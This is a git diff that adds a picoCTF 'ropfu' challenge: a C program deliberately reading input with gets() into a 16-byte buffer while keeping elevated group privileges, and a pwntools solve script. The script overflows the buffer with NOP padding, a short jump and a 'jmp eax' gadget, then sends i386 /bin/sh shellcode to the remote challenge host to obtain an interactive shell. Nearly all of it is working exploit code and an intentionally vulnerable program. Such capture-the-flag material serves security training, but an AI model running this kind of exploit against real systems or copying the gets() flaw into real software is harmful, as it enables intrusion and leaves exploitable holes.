diff --git a/pwn/ropfu/solve.py b/pwn/ropfu/solve.py new file mode 100755 index 0000000..fba671a --- /dev/null +++ b/pwn/ropfu/solve.py @@ -0,0 +1,43 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])" + +from pwn import * + +exe = ELF("./vuln") + +context.binary = exe + +ADDR, PORT, *_ = "saturn.picoctf.net 60930".split() + +def conn(): + if args.REMOTE: + r = remote(ADDR, PORT) + else: + r = process([exe.path]) + return r + +def main(): + r = conn() + + print(r.recvuntil(b"How strong is your ROP-fu? Snatch the shell from my hand, grasshopper!\n")) + offset = 28 # found with pwndbg + + rop = ROP(exe) + + jmp_eax = asm('jmp $+0x6') # 2 for jmp + 4 for ret address + for _ in range(offset - len(jmp_eax)): + rop.raw(asm('nop')) + rop.raw(jmp_eax) + + # NOTE: rop.find_gadget(['jmp eax'])[0] Does not work because it does not end with 'ret' + jmp_eax_gadget = next(exe.search(asm("jmp eax"))) + rop.raw(jmp_eax_gadget) + + rop.raw(asm(shellcraft.i386.linux.sh())) + + r.sendline(rop.chain()) + r.interactive() + r.close() + +if __name__ == "__main__": + main() diff --git a/pwn/ropfu/vuln b/pwn/ropfu/vuln new file mode 100755 index 0000000..30fc8d9 Binary files /dev/null and b/pwn/ropfu/vuln differ diff --git a/pwn/ropfu/vuln.c b/pwn/ropfu/vuln.c new file mode 100644 index 0000000..06c6719 --- /dev/null +++ b/pwn/ropfu/vuln.c @@ -0,0 +1,27 @@ +#include +#include +#include +#include +#include + +#define BUFSIZE 16 + +void vuln() { + char buf[16]; + printf("How strong is your ROP-fu? Snatch the shell from my hand, grasshopper!\n"); + return gets(buf); + +} + +int main(int argc, char **argv){ + + setvbuf(stdout, NULL, _IONBF, 0); + + + // Set the gid to the effective gid + // this prevents /bin/sh from dropping the privileges + gid_t gid = getegid(); + setresgid(gid, gid, gid); + vuln(); + +}